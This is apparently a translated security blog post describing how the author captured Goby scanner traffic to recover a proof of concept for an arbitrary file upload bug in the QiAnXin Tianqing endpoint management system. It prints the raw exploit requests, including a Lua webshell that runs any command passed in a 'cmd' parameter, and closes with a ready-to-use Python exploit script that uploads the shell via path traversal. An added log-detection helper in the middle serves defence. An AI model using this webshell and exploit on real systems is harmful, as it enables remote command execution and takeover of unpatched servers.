
Capturing Goby Traffic to Obtain a Vulnerability POC

0x01 Background

Goby is a network security testing tool, and I have to say it is genuinely good. After more than half a year, I used Goby again for a second full asset scan of the department and found dozens of vulnerabilities during the scan.

One of them was a critical vulnerability (QiAnXin Tianqing terminal security management system client_upload_file.json getshell): arbitrary file upload in the Tianqing endpoint security management system. There were no vulnerability details on Google, Bing, or Baidu; all I knew was that it surfaced during this year's HVV period. Verifying it directly with Goby gives the following:

Good grief, SYSTEM privileges straight away. Since the POC could not be obtained online, the idea of capturing Goby's packets to extract the POC came up.

0x02 Tool Preparation

Tools required: Burp Suite, Proxifier

Installation details: omitted

0x03 Obtaining the POC

Open Proxifier and add a proxy (Proxies):

Add a rule (Rules): the application name is goby-cmd, and 10.100.10.57:80 is selected as the target.

Open Burp and wait for the capture.

Finally, open Goby's vulnerability verification page, click the verify button, and obtain the packets from Burp as follows:

After the upload, the command execution URL is as follows:

Open it in a browser, with any command after cmd:

The cleaned-up request packets are as follows:

```http
# Request 1
POST /api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/xxxx.LUAC HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 323
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ
Cookie: SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Connection: close

------WebKitFormBoundaryLx7ATxHThfk91oxQ
Content-Disposition: form-data; name="file"; filename="flash.php"
Content-Type: application/xxxx

if ngx.req.get_uri_args().cmd then
    cmd = ngx.req.get_uri_args().cmd
    local t = io.popen(cmd)
    local a = t:read("*all")
    ngx.say(a)
end
------WebKitFormBoundaryLx7ATxHThfk91oxQ--
```
```http
# Request 2
GET /api/xxxx.json?cmd=whoami HTTP/1.1
Host: 10.100.10.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
```
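From the defender's side, the two requests above leave a recognisable trace in the web server's access log: an upload to `client_upload_file.json` whose `filename` parameter traverses into `../../lua/` or ends in `.LUAC`, followed by a GET to a `.json` endpoint under `/api/` carrying a `cmd` parameter with the same basename. The following detection helper is an added example and not part of the original post; the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format, shortened).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0800] "POST /api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/ab12.LUAC HTTP/1.1" 200 17
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /api/ab12.json?cmd=whoami HTTP/1.1" 200 42
10.0.0.9 - - [01/Jan/2024:10:00:02 +0800] "POST /api/client_upload_file.json?mid=1&md5=2&filename=report.txt HTTP/1.1" 200 17
10.0.0.9 - - [01/Jan/2024:10:00:03 +0800] "GET /api/status.json HTTP/1.1" 200 5
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

def classify(line):
    """Return (kind, client_ip, detail) tuples for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    hits = []
    if parts.path.endswith("/api/client_upload_file.json"):
        # parse_qs already decoded once; decode again to catch double-encoding
        fname = unquote(q.get("filename", ""))
        if ".." in fname or fname.lower().endswith(".luac"):
            hits.append(("traversal-upload", m.group("ip"), fname))
    elif parts.path.startswith("/api/") and parts.path.endswith(".json") and "cmd" in q:
        hits.append(("cmd-param", m.group("ip"), parts.path))
    return hits

def _stem(path):
    """'../../lua/ab12.LUAC' -> 'ab12'; '/api/ab12.json' -> 'ab12'."""
    return path.rsplit("/", 1)[-1].rsplit(".", 1)[0].lower()

def scan(log_text):
    """Scan a whole log and upgrade cmd hits that reuse an uploaded name."""
    uploaded = set()
    alerts = []
    for line in log_text.splitlines():
        for kind, ip, detail in classify(line):
            if kind == "traversal-upload":
                uploaded.add(_stem(detail))
            elif kind == "cmd-param" and _stem(detail) in uploaded:
                kind = "upload-exec-chain"
            alerts.append((kind, ip, detail))
    return alerts
```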

Writing a Python POC script:

```python
import requests
import random
import string

# Define the webshell
shell = '''if ngx.req.get_uri_args().cmd then
cmd = ngx.req.get_uri_args().cmd
local t = io.popen(cmd)
local a = t:read("*all")
ngx.say(a)
end
'''

# Define a 4-character random string
random_str = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(4))

# Enter the target
url = input("input the TARGET(example:[url]https://127.0.0.1:1080[/url])\nurl >>>")
# Define the upload path
upload_url = url+"/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/"+random_str+".LUAC"

headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15"}
files = {'file': shell}

# Upload
upload_res = requests.post(upload_url,headers=headers,files=files)

# Execute the command
cmd_url = url+'/api/'+random_str+'.json'
params = {"cmd":"whoami"}
res = requests.get(url=cmd_url,headers=headers,params=params)
s = res.status_code

if s==200:
    print('shell is here:'+cmd_url+'?cmd=command')
else:
    print('不存在漏洞')
```